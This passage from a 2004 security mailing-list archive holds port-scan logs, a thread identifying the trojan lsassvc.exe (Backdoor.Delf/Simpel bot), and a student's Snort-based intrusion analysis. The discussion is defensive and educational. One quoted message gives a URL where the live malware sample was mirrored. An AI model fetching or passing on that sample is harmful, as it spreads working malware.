SYN ******S* 8240 Jul 9 00:56:16 221.4.72.43:3063 -> xxx.yyy.10.50:5554 SYN ******S* Jul 9 00:56:17 221.4.72.43:3360 -> xxx.yyy.10.50:1023 SYN ******S* Jul 9 00:56:19 221.4.72.43:3955 -> xxx.yyy.10.50:9898 SYN ******S* Jul 9 00:56:16 221.4.72.43:3064 -> xxx.yyy.10.51:5554 SYN ******S* Jul 9 00:56:17 221.4.72.43:3385 -> xxx.yyy.10.51:1023 SYN ******S* Jul 9 00:56:16 221.4.72.43:3066 -> xxx.yyy.10.53:5554 SYN ******S* Jul 9 00:56:17 221.4.72.43:3390 -> xxx.yyy.10.53:1023 SYN ******S* Jul 9 00:56:16 221.4.72.43:3067 -> xxx.yyy.10.54:5554 SYN ******S* [...] Jul 9 00:58:25 221.4.72.43:2293 -> xxx.yyy.29.248:9898 SYN ******S* Jul 9 00:58:25 221.4.72.43:2299 -> xxx.yyy.29.249:9898 SYN ******S* Jul 9 00:58:25 221.4.72.43:2303 -> xxx.yyy.29.251:9898 SYN ******S* Jul 9 00:58:25 221.4.72.43:2302 -> xxx.yyy.29.250:9898 SYN ******S* Jul 9 00:58:25 221.4.72.43:2306 -> xxx.yyy.29.252:9898 SYN ******S* Jul 9 00:58:25 221.4.72.43:2314 -> xxx.yyy.29.253:9898 SYN ******S* Jul 9 00:58:25 221.4.72.43:2315 -> xxx.yyy.29.254:9898 SYN ******S* Jul 9 00:58:25 221.4.72.43:2318 -> xxx.yyy.29.255:9898 SYN ******S* 6176 Jul 9 00:56:19 218.61.200.177:1646 -> xxx.yyy.64.0:5554 SYN ******S* Jul 9 00:56:20 218.61.200.177:2212 -> xxx.yyy.64.0:1023 SYN ******S* Jul 9 00:56:22 218.61.200.177:3189 -> xxx.yyy.64.0:9898 SYN ******S* Jul 9 00:56:19 218.61.200.177:1648 -> xxx.yyy.64.1:5554 SYN ******S* Jul 9 00:56:20 218.61.200.177:2215 -> xxx.yyy.64.1:1023 SYN ******S* Jul 9 00:56:22 218.61.200.177:3190 -> xxx.yyy.64.1:9898 SYN ******S* Jul 9 00:56:19 218.61.200.177:1653 -> xxx.yyy.64.2:5554 SYN ******S* Jul 9 00:56:20 218.61.200.177:2231 -> xxx.yyy.64.2:1023 SYN ******S* [...] Jul 9 00:56:38 218.61.200.177:3697 -> xxx.yyy.71.58:9898 SYN ******S* Jul 9 00:56:38 218.61.200.177:3698 -> xxx.yyy.71.59:9898 SYN ******S* Jul 9 00:56:38 218.61.200.177:3699 -> xxx.yyy.71.60:9898 SYN ******S* Jul 9 00:56:38 218.61.200.177:3703 -> xxx.yyy.71.52:9898 SYN ******S* Jul 9 00:56:38 218.61.200.177:3758 -> xxx.yyy.71.75:9898 SYN ******S* Jul 9 00:56:38 218.61.200.177:3759 -> xxx.yyy.71.72:9898 SYN ******S* Jul 9 00:56:38 218.61.200.177:3820 -> xxx.yyy.71.83:9898 SYN ******S* Jul 9 00:56:38 218.61.200.177:4136 -> xxx.yyy.71.127:9898 SYN ******S* Jul 9 00:56:38 218.61.200.177:4146 -> xxx.yyy.71.130:9898 SYN ******S* 4762 Jul 9 00:55:56 218.109.24.87:4363 -> xxx.yyy.154.100:9898 SYN ******S* Jul 9 00:55:56 218.109.24.87:4364 -> xxx.yyy.154.101:9898 SYN ******S* Jul 9 00:55:56 218.109.24.87:4377 -> xxx.yyy.154.106:9898 SYN ******S* Jul 9 00:55:56 218.109.24.87:4434 -> xxx.yyy.154.103:9898 SYN ******S* Jul 9 00:55:56 218.109.24.87:4435 -> xxx.yyy.154.104:9898 SYN ******S* Jul 9 00:55:56 218.109.24.87:4436 -> xxx.yyy.154.105:9898 SYN ******S* Jul 9 00:55:56 218.109.24.87:4457 -> xxx.yyy.154.102:9898 SYN ******S* Jul 9 00:55:57 218.109.24.87:4481 -> xxx.yyy.154.107:9898 SYN ******S* [...] Jul 9 00:57:07 218.109.24.87:4536 -> xxx.yyy.174.219:9898 SYN ******S* Jul 9 00:57:07 218.109.24.87:4537 -> xxx.yyy.174.208:9898 SYN ******S* Jul 9 00:57:07 218.109.24.87:4540 -> xxx.yyy.174.211:9898 SYN ******S* Jul 9 00:57:07 218.109.24.87:4541 -> xxx.yyy.174.212:9898 SYN ******S* Jul 9 00:57:07 218.109.24.87:4539 -> xxx.yyy.174.210:9898 SYN ******S* Jul 9 00:57:07 218.109.24.87:4553 -> xxx.yyy.174.214:9898 SYN ******S* Jul 9 00:57:07 218.109.24.87:4542 -> xxx.yyy.174.213:9898 SYN ******S* Jul 9 00:57:07 218.109.24.87:4556 -> xxx.yyy.174.216:9898 SYN ******S* Jul 9 00:57:07 218.109.24.87:4554 -> xxx.yyy.174.215:9898 SYN ******S* 4409 Jul 9 00:56:31 218.24.68.146:2409 -> xxx.yyy.10.164:5554 SYN ******S* Jul 9 00:56:32 218.24.68.146:3170 -> xxx.yyy.10.164:1023 SYN ******S* Jul 9 00:56:34 218.24.68.146:1035 -> xxx.yyy.10.164:9898 SYN ******S* Jul 9 00:56:31 218.24.68.146:2408 -> xxx.yyy.10.163:5554 SYN ******S* Jul 9 00:56:32 218.24.68.146:3169 -> xxx.yyy.10.163:1023 SYN ******S* Jul 9 00:56:34 218.24.68.146:1034 -> xxx.yyy.10.163:9898 SYN ******S* Jul 9 00:56:31 218.24.68.146:2411 -> xxx.yyy.10.166:5554 SYN ******S* Jul 9 00:56:32 218.24.68.146:3172 -> xxx.yyy.10.166:1023 SYN ******S* [...] Jul 9 00:57:17 218.24.68.146:2237 -> xxx.yyy.11.234:9898 SYN ******S* Jul 9 00:57:17 218.24.68.146:2239 -> xxx.yyy.11.236:9898 SYN ******S* Jul 9 00:57:17 218.24.68.146:2241 -> xxx.yyy.11.238:9898 SYN ******S* Jul 9 00:57:17 218.24.68.146:2242 -> xxx.yyy.11.239:9898 SYN ******S* Jul 9 00:57:17 218.24.68.146:2240 -> xxx.yyy.11.237:9898 SYN ******S* Jul 9 00:57:17 218.24.68.146:2244 -> xxx.yyy.11.241:9898 SYN ******S* Jul 9 00:57:17 218.24.68.146:2243 -> xxx.yyy.11.240:9898 SYN ******S* Jul 9 00:57:17 218.24.68.146:2245 -> xxx.yyy.11.242:9898 SYN ******S* 4026 Jul 9 00:32:20 61.170.155.136:3900 -> xxx.yyy.154.100:1023 SYN ******S* Jul 9 00:32:20 61.170.155.136:3910 -> xxx.yyy.154.103:1023 SYN ******S* Jul 9 00:32:22 61.170.155.136:1444 -> xxx.yyy.154.103:9898 SYN ******S* Jul 9 00:32:20 61.170.155.136:3914 -> xxx.yyy.154.111:1023 SYN ******S* Jul 9 00:32:20 61.170.155.136:3915 -> xxx.yyy.154.114:1023 SYN ******S* Jul 9 00:32:20 61.170.155.136:3920 -> xxx.yyy.154.129:1023 SYN ******S* Jul 9 00:32:22 61.170.155.136:1455 -> xxx.yyy.154.129:9898 SYN ******S* Jul 9 00:32:20 61.170.155.136:3927 -> xxx.yyy.154.135:1023 SYN ******S* [...] Jul 9 00:33:01 61.170.155.136:2266 -> xxx.yyy.174.213:9898 SYN ******S* Jul 9 00:33:01 61.170.155.136:2275 -> xxx.yyy.174.217:9898 SYN ******S* Jul 9 00:33:01 61.170.155.136:2278 -> xxx.yyy.174.219:9898 SYN ******S* Jul 9 00:33:01 61.170.155.136:2281 -> xxx.yyy.174.220:9898 SYN ******S* Jul 9 00:33:01 61.170.155.136:2282 -> xxx.yyy.174.222:9898 SYN ******S* Jul 9 00:33:01 61.170.155.136:2285 -> xxx.yyy.174.221:9898 SYN ******S* Jul 9 00:33:01 61.170.155.136:2288 -> xxx.yyy.154.123:9898 SYN ******S* Jul 9 00:33:01 61.170.155.136:2291 -> xxx.yyy.154.127:9898 SYN ******S* 3699 Jul 9 00:56:46 218.108.181.144:1927 -> xxx.yyy.174.222:9898 SYN ******S* Jul 9 00:56:46 218.108.181.144:1928 -> xxx.yyy.174.223:9898 SYN ******S* Jul 9 00:56:46 218.108.181.144:1929 -> xxx.yyy.174.224:9898 SYN ******S* Jul 9 00:56:46 218.108.181.144:1930 -> xxx.yyy.174.225:9898 SYN ******S* Jul 9 00:56:46 218.108.181.144:1931 -> xxx.yyy.174.226:9898 SYN ******S* Jul 9 00:56:46 218.108.181.144:1932 -> xxx.yyy.174.227:9898 SYN ******S* Jul 9 00:56:46 218.108.181.144:1933 -> xxx.yyy.174.228:9898 SYN ******S* Jul 9 00:56:46 218.108.181.144:1934 -> xxx.yyy.174.229:9898 SYN ******S* [...] Jul 9 00:57:26 218.108.181.144:1977 -> xxx.yyy.195.79:9898 SYN ******S* Jul 9 00:57:26 218.108.181.144:1979 -> xxx.yyy.195.81:9898 SYN ******S* Jul 9 00:57:26 218.108.181.144:1980 -> xxx.yyy.195.82:9898 SYN ******S* Jul 9 00:57:26 218.108.181.144:1981 -> xxx.yyy.195.83:9898 SYN ******S* Jul 9 00:57:26 218.108.181.144:1982 -> xxx.yyy.195.84:9898 SYN ******S* Jul 9 00:57:26 218.108.181.144:1983 -> xxx.yyy.195.85:9898 SYN ******S* Jul 9 00:57:26 218.108.181.144:1984 -> xxx.yyy.195.86:9898 SYN ******S* Jul 9 00:57:26 218.108.181.144:1985 -> xxx.yyy.195.87:9898 SYN ******S* Jul 9 00:57:26 218.108.181.144:1986 -> xxx.yyy.195.88:9898 SYN ******S* 3435 -- - Ken =========================================================================== Ken Connelly (KC152) Systems and Operations Manager, ITS - Network Services University of Northern Iowa Cedar Falls, IA 50614-0121 email: Ken.Connelly at uni.edu phone: (319) 273-5850 fax: (319) 273-7373 From techno.kid at gmx.de Sat Jul 10 17:59:22 2004 From: techno.kid at gmx.de (techno.kid at gmx.de) Date: Sat, 10 Jul 2004 19:59:22 +0200 Subject: [Intrusions] Need help to identify a trojan In-Reply-To: <200407101448.i6AEmK529891@dshield.com> Message-ID: <40F04A9A.13720.1496DC@localhost> > Date: Fri, 9 Jul 2004 09:34:50 -0400 > From: "Maxime Ducharme" > Subject: [Intrusions] Need help to identify a trojan > Hi to the list, > one of our customer's servers have been compromised and I'd > need help to identify trojan used. I did a shor lookup at www.virustotal.com and "they" know it: Virus Total _______________________________________________ Scan results File: lsassvc.exe Date: 07/10/2004 19:42:07 ---- BitDefender 7.0/20040710 found nothing ClamWin devel-20040517/20040708 found nothing eTrustAV-Inoc 4641/20040708 found nothing F-Prot 3.15/20040708 found nothing Kaspersky 3.0/20040710 found [Backdoor.Delf.oy] McAfee 4375/20040709 found nothing NOD32v2 1.807/20040710 found nothing Norman 5.70.10/20040709 found nothing Panda 7.02.00/20040710 found nothing Sybari 7.5.1314/20040710 found [Backdoor.Delf.oy] Symantec 8.0/20040709 found nothing TrendMicro 7.000/20040709 found nothing So that you know how the trojan is called you should figure out how it was possible that it came on the IIS... techno.kid From tliston at premmag.com Sat Jul 10 18:01:37 2004 From: tliston at premmag.com (Tom Liston) Date: Sat, 10 Jul 2004 13:01:37 -0500 Subject: [Intrusions] Need help to identify a trojan In-Reply-To: <020e01c465b9$8268d500$a900a8c0@cybergeneration.com> Message-ID: <40EFE8B1.15761.12A3E67@localhost> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Maxime- The lsassvc.exe file is identified by Kasperski as Backdoor.Delf.oy While I wasn't able to find any information on this particular variant, here are some links to information on the Backdoor.Delf strain. http://securityresponse.symantec.com/avcenter/venc/data/backdoor.delf.html http://www.pestpatrol.com/pestinfo/b/backdoor_delf.asp http://vil.nai.com/vil/content/v_99535.htm - -TL SANS Internet Storm Center Malware Analysis Team On 9 Jul 2004 at 9:34, Maxime Ducharme wrote: - ---- >8 ---- Snip! > The lsassvc.exe is still on angelfire's web server, and I mirrored it > here : > http://www.cybergeneration.com/security/2004.07.08/lsassvc.ex_ > > This file is bound to TCP port 753, and a connection on this > port output this : > 220 jsdaus Microsoft FTP Service (Version 5.0) > > Looks like a "special" FTP service. The program answers my "USER" > and "PASS" commands : > > USER test > < 331 Password required for test. > > PASS test > < 530 Login incorrect. > > It is also bound on a service name "Local Security Authority Service > System". > > Norton says this file is not infected, but it looks really suspicious, we > already shut down the server for analysis. It has been used for scanning. > > Other hack tools have been found under C:\RECYCLER\speedy. > > I'd like to know which kind of trojan it is, and if it has self-propagating > behavior like some Ago-Gaobot. -----BEGIN PGP SIGNATURE----- Version: idw's PGP-Frontend 4.9.6.4 / 6-2004 + PGP 8.1.0 Comment: http://www.hackbusters.net/pgp.txt (FCEB5E7400758B031E4A2948) iQA/AwUBQPAvB6Oq/X4cwCZKEQL+3wCfdiY9Sb1sOhul/qAxVMeS2QMkFh4An2Cu lCvkmiMh39xwMyBchgJ5U62K =w8JN -----END PGP SIGNATURE----- From vilaiporn_taweelappontong at yahoo.com Sun Jul 11 02:30:50 2004 From: vilaiporn_taweelappontong at yahoo.com (Vilaiporn Taweelappontong) Date: Sat, 10 Jul 2004 19:30:50 -0700 (PDT) Subject: [Intrusions] LOGS: GIAC GCIA Version 3.4 Practical Detect Vilaiporn Taweelappontong Message-ID: <20040711023050.52515.qmail@web51807.mail.yahoo.com> Dear all This is a second attempt to post the assignment. I would really appreciate if someone could give me comments on my analysis. Thank you very much in advance and regards, Vilaiporn 1. Source of trace Source of trace was file 2003.12.15.6 downloaded from www.incidents.org/log. -Statistics (from Ethereal) File length: 3000044 Format: libpcap Start time: 2:07:16.936242 End time: 2:08:17.518422 Elapsed time between first and last packet: 60.582 seconds Packet count: 36672 Snapshot length: 96 I used the Statistics function of ethereal to summarize a list of IP addresses and MAC addresses in the file. And I looked up a vendor Ethernet MAC address from the web site http://www.coffer.com/mac_find/. Below is an architecture base on my understanding: 10.10.10.165 (00:03:47:8c:89:c2 Intel machine ) ---> 3COM (00:01:02:79:91:ed) ---> Sniffer ----> Firewall ---> 192.168.17.68 (00:50:56:40:00:6D VMWARE) Observation: File date and timestamp reported are different. The file name indicate that the data should be 2003/12/15 but the date specified in all packets actually indicated packets generated on 2003/11/19. I understand that some technique was used to obfuscate the information, such as modify ip address, as checksum of all packets are correct. Or no obfuscation has been done. 2. Detect was generated by The file is stored in tcpdump binary format. The detect presented in this assignment was generated by Snort version 2.1.1, which I ran the analysis with my Windows 2000 Server machine. I ran snort in the NIDS mode with standard snort ruleset downloaded on 2 May 2004. All rules files were enabled. Command that was used: C:\snort\bin\snort -r 2003.12.5.6 -c c:\snort\etc\snort.conf -l ex1 -X -d -A full -r 2003.12.5.6 read source file 2003.12.5.6 -c c:\snort\etc\snort.conf run against the configuration file snort.conf -l ex1 log the output file (alert file and log file) in ex1 folder -X dump the raw packet data starting at the link layer (in this case, this is the Ethernet header) -d dump the application layer (dump the packet payloads with the packet headers) -A full display text alert with full packet headers The selected alert result is as follow: [**] (http_inspect) BARE BYTE UNICODE ENCODING [**] 11/19-02:08:04.823979 10.10.10.165:1085 -> 192.168.17.68:80 TCP TTL:128 TOS:0x0 ID:42592 IpLen:20 DgmLen:41 DF ***A**** Seq: 0xE4F18713 Ack: 0x16A6B6DB Win: 0x4470 TcpLen: 20 The snort rule that trigger the ?Bare Byte Unicode Encoding? was the http_inspect in the preprocessor configure. [1] Preprocessors take the decoded packets from the Snort packet decoder and can examine or manipulate them before they are handed to the detection engine. preprocessor stream4_reassemble preprocessor http_inspect: global \ iis_unicode_map unicode.map 1252 preprocessor http_inspect_server: server default \ profile all ports { 80 8080 8180 } \ oversize_dir_length 500 Note that profile all includes the ?bare byte decoding? enabled. The following configuration were displayed when you run snort (without quiet option enabled). You can see that the bare byte option was set to YES. HttpInspect Config: GLOBAL CONFIG Max Pipeline Requests: 0 Inspection Type: STATELESS Detect Proxy Usage: NO IIS Unicode Map Filename: c:\snort\etc\unicode.map IIS Unicode Map Codepage: 1252 DEFAULT SERVER CONFIG: Ports: 80 8080 8180 Flow Depth: 300 Max Chunk Length: 500000 Inspect Pipeline Requests: YES URI Discovery Strict Mode: NO Allow Proxy Usage: NO Disable Alerting: YES Oversize Dir Length: 500 Only inspect URI: NO Ascii: YES alert: NO Double Decoding: YES alert: YES %U Encoding: YES alert: YES Bare Byte: YES alert: YES Base36: OFF UTF 8: OFF IIS Unicode: YES alert: YES Multiple Slash: YES alert: NO IIS Backslash: YES alert: NO Directory: YES alert: NO Apache WhiteSpace: YES alert: YES IIS Delimiter: YES alert: YES IIS Unicode Map: GLOBAL IIS UNICODE MAP CONFIG Non-RFC Compliant Characters: NONE To look into the packet in details, I used windump to generate packet in hex format: C:\windump>windump -r 2003.12.15.6 -x -vv -n "dst host 192.168.17.68 and port 80" 02:08:04.823979 IP (tos 0x0, ttl 128, id 42592, len 41) 10.10.10.165.1085 > 192. 168.17.68.80: . [tcp sum ok] 3841034003:3841034004(1) ack 380024539 win 17520 (DF) 4500 0029 a660 4000 8006 6dd3 0a0a 0aa5 c0a8 1144 043d 0050 e4f1 8713 16a6 b6db 5010 4470 b6b3 0000 9000 0000 0000 It?s obvious that host 192.168.17.68 is a web server and it?s IIS. The data field displayed in hex above is ?90? (NOP bytes usually used by shellcode) which seems like someone is trying a buffer overflow on the web server. Let?s also look at other packets associated with host 192.168.17.68 for a better analysis. C:\Snort\log\old>snort -r 2003.12.15.6 -v -q "host 192.168.17.68" 11/19-02:07:48.841453 10.10.10.165:1691 -> 192.168.17.68:1080 TCP TTL:128 TOS:0x0 ID:41554 IpLen:20 DgmLen:48 DF ******S* Seq: 0x293AB444 Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/19-02:07:51.828714 10.10.10.165:1691 -> 192.168.17.68:1080 TCP TTL:128 TOS:0x0 ID:41720 IpLen:20 DgmLen:48 DF ******S* Seq: 0x293AB444 Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/19-02:07:57.968183 10.10.10.165:1691 -> 192.168.17.68:1080 TCP TTL:128 TOS:0x0 ID:42089 IpLen:20 DgmLen:48 DF ******S* Seq: 0x293AB444 Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/19-02:07:59.094302 10.10.10.165:1703 -> 192.168.17.68:1080 TCP TTL:128 TOS:0x0 ID:42248 IpLen:20 DgmLen:48 DF ******S* Seq: 0x296B9F43 Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/19-02:08:02.163499 10.10.10.165:1703 -> 192.168.17.68:1080 TCP TTL:128 TOS:0x0 ID:42416 IpLen:20 DgmLen:48 DF ******S* Seq: 0x296B9F43 Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/19-02:08:04.823979 10.10.10.165:1085 -> 192.168.17.68:80 TCP TTL:128 TOS:0x0 ID:42592 IpLen:20 DgmLen:41 DF ***A**** Seq: 0xE4F18713 Ack: 0x16A6B6DB Win: 0x4470 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/19-02:08:08.302980 10.10.10.165:1703 -> 192.168.17.68:1080 TCP TTL:128 TOS:0x0 ID:42605 IpLen:20 DgmLen:48 DF ******S* Seq: 0x296B9F43 Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/19-02:08:09.095015 10.10.10.165:1711 -> 192.168.17.68:1080 TCP TTL:128 TOS:0x0 ID:42615 IpLen:20 DgmLen:48 DF ******S* Seq: 0x2999ACB6 Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/19-02:08:12.089067 10.10.10.165:1711 -> 192.168.17.68:1080 TCP TTL:128 TOS:0x0 ID:42647 IpLen:20 DgmLen:48 DF ******S* Seq: 0x2999ACB6 Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ Run time for packet processing was 0.750000 seconds The above information still not enough to analyse the intruder?s attempt so I have merged all log files into one with the following command. C:> mergecap -w merge 2003.12.15.1 2003.12.15.2 2003.12.15.3 2003.12.15.4 2003.12.15.5 2003.12.15.6 2003.12.15.7 2003.12.15.8 2003.12.15.9 2003.12.15.10 2003.12.15.11 2003.12.15.12 2003.12.15.13 2003.12.15.14 Then I ran snort again with the same set of rules. Some of the results that I got were shown below: =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/19-02:05:05.114599 10.10.10.165:2695 -> 192.168.17.68:1 TCP TTL:128 TOS:0x0 ID:21572 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8158842 Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/19-02:05:05.115021 10.10.10.165:2696 -> 192.168.17.68:2 TCP TTL:128 TOS:0x0 ID:21573 IpLen:20 DgmLen:48 DF ******S* Seq: 0x816111F Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/19-02:05:05.116627 10.10.10.165:2697 -> 192.168.17.68:3 TCP TTL:128 TOS:0x0 ID:21574 IpLen:20 DgmLen:48 DF ******S* Seq: 0x816B61C Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/19-02:05:05.117195 10.10.10.165:2698 -> 192.168.17.68:4 TCP TTL:128 TOS:0x0 ID:21575 IpLen:20 DgmLen:48 DF ******S* Seq: 0x817B1FC Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/19-02:05:05.117646 10.10.10.165:2699 -> 192.168.17.68:5 TCP TTL:128 TOS:0x0 ID:21576 IpLen:20 DgmLen:48 DF ******S* Seq: 0x81865D4 Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ The above are just sample packets. We can tell from the generated packets that the attacker did TCP port scan and UDP port scan to identified the open ports of host 192.168.17.68. Once port 80 is found running, the attack knew that this is a web server. So the attacker was trying to scan the server with, probably, web server scanning tools. 3. Probability the source address was spoofed HTTP session requires a complete 3-way handshake. This packet, however, did not complete the handshake so it is unlikely that the source ip would be spoofed. 4. Description of attack [1] Bare byte encoding is an IIS trick that uses non-ASCII chars as valid values in decoding UTF-8 values. This is NOT in the HTTP standard, as all non-ASCII values have to be encoded with a %. Bare byte encoding allows the user to emulate an IIS server and interpret non-standard encodings correctly. There are no legitimate clients that encoded UTF-8 this way, since it is non-standard. For more descriptions on the terms being used, Unicode is a single unified character set. Unicode provides a unique number for every character, no matter what the platform, no matter what the program, no matter what the language. [5] UTF-8 is a method to encode character to Unicode. (one of the three common encoding method) UTF-8 encodes each Unicode character as a variable number of 1 to 4 octets. Using Unicode/UTF-8, you can write in emails and source code things such as Mathematics and Sciences or different languages. ASCII - ASCII code is the numerical representation of a character. Because computer can only understand numbers. All non-ASCII characters usually screwed up when output it to the browser, such as some special character or language. UTF-8 supports ASCII characters but not very good in non-ASCII character. A http connection to the web server will usually start with a request method such as GET or POST. All packets (except for the highlighted one) has started a 3 way handshake by initiating SYN to the web server. Somehow the highlighted packet sent the packet with ACK flag set to the web server without the request method. This does not follow the RFC2616 and trigger snort rule to alert. The result from Ethereal actually display this packet at ?Continuation? which means there is no request in the packet. 5. Attack mechanism As I analyzed the combined log, I found that host 10.10.10.165 tried various attacks against host 192.168.17.68 including TCP scan, UDP scan, socks scan and probably Unicode attack. Usually I would try to obtain the correlation evidence from the secondary resource such as web server to confirm the attack. However, the secondary resource is not available in this case and we only have the snort log up to less than 2 hours. With such limitation I would assume that the attack using Unicode, somehow, was used as part of the scanning process and one of the scanning policy happen to use the non-ASCII character that trigger the snort rule to alert. To confirm my understanding, I set up a web server at home and wrote some e-commerce pages. Then I ran snort with the same rule set and used N-Stealth, a HTTP Security Scanner, to scan the e-commerce application that I created. N-Stealth used various combinations of possible web application attack and generated a lot of alerts including bare byte Unicode encoding? alerts. 6. Correlations Bare byte Unicode encoding is considered under the Unicode attack category. The Unicode attack was previously raised by Bruce Schneier at http://www.schneier.com/crypto-gram-0007.html 7. Evidence of active targeting The attacker was trying to scan for vulnerable host. Host 192.168.17.68 is not the key target at first. 8. Severity Severity = (criticality + lethality) (system countermeasures + network countermeasures) Criticality 4: This attack targets the IIS Server which is a widely used web server worldwide. Lethality 2: This attack could be part of the scanning and DoS. If successful, it could bring down the server. For this case, this server is not the target at first. The attacker performed host scanning to look for vulnerable host. The attacker may have succeeded compromise the server. From the log, there?s no sign of system down. System countermeasures 2: The problem of IIS way of encoding the non-ASCII character cannot be resolved solely by patching. So I give 2. Network countermeasures 2: Firewalls and routers cannot prevent the Unicode attack that well. So I give 2 for this as well. Unless a specific web application firewall is being used, then I will give a higher rating. Severity = (4 + 2) - (2 + 2) = 2 9. Defensive recommendation -Apply necessary patches to prevent known vulnerabilities at the web server or operating system. -Apply a secure programming concept when developing the web application. Necessary input validation must be in place to filter out characters that will not be needed. For most of the case, non-ASCII character won?t be needed for any field. -Have network measures in place such as properly configured router, firewalls and IDS. 10. Multiple choice questions Which web server could be vulnerable to ?bare byte Unicode encoding? attack? A. IIS B. Netscape C. Apache D. Any web server Answer: A __________________________________ Do you Yahoo!? New and Improved Yahoo! Mail - Send 10MB messages! http://promotions.yahoo.com/new_mail From api at epost.de Sat Jul 10 21:24:05 2004 From: api at epost.de (Axel Pettinger) Date: Sat, 10 Jul 2004 23:24:05 +0200 Subject: [Intrusions] Need help to identify a trojan References: <020e01c465b9$8268d500$a900a8c0@cybergeneration.com> Message-ID: <40F05E75.E6B648BD@epost.de> Maxime Ducharme wrote: > > Hi to the list, > one of our customer's servers have been compromised and I'd > need help to identify trojan used. [snip] > This file is bound to TCP port 753, and a connection on this > port output this : > 220 jsdaus Microsoft FTP Service (Version 5.0) [snip] > Norton says this file is not infected, That's correct as - strictly speaking - it isn't "infected" ... ;-) > but it looks really suspicious, Unpack the file using UPX and then have a look at it with something like Notepad. > we already shut down the server for analysis. It has been used for > scanning. > > Other hack tools have been found under C:\RECYCLER\speedy. > > I'd like to know which kind of trojan it is, and if it has > self-propagating behavior like some Ago-Gaobot. I don't know that for sure but I really doubt it. McAfee identifies the file (MD5: ffdbe99a3e614650d93b310a34273d4e) as "application SimpelFTP" - note that it doesn't report it as a trojan, only as a "potentially unwanted application". This sounds certainly a little bit strange because other av scanners identify it as a backdoor trojan variant named "Delf" and the file itself contains the string "Simpel IRC BOT". There seem to be several variants of that "Simpel" program, because the one mentioned in the VGrep virus data base obviously cannot be the one you found: http://www.virusbtn.com/resources/vgrep/vgrep.cgi?terms=SimpelFTP&product=8 Regards, Axel Pettinger From Ken.Connelly at uni.edu Sun Jul 11 12:19:00 2004 From: Ken.Connelly at uni.edu (Ken.Connelly at uni.edu) Date: Sun, 11 Jul 2004 07:19:00 -0500 (CDT) Subject: [Intrusions] [LOGS] Summary of large-scale portscanning detects Message-ID: <01LCBRX9QW1G8YDL7A@uni.edu> The following extracts show the beginning and ending of scan activity was detected on my network. The number following each set is the total number of probes for that source. Timestamps are GMT-0500. Jul 10 08:05:16 68.78.100.246:22002 -> xxx.yyy.1.0:3127 SYN ******S* Jul 10 08:05:16 68.78.100.246:22002 -> xxx.yyy.1.0:1080 SYN ******S* Jul 10 08:05:16 68.78.100.246:22002 -> xxx.yyy.1.0:10080 SYN ******S* Jul 10 08:05:16 68.78.100.246:22002 -> xxx.yyy.1.0:3128 SYN ******S* Jul 10 08:05:16 68.78.100.246:22002 -> xxx.yyy.1.1:3127 SYN ******S* Jul 10 08:05:16 68.78.100.246:22002 -> xxx.yyy.1.1:1080 SYN ******S* Jul 10 08:05:16 68.78.100.246:22002 -> 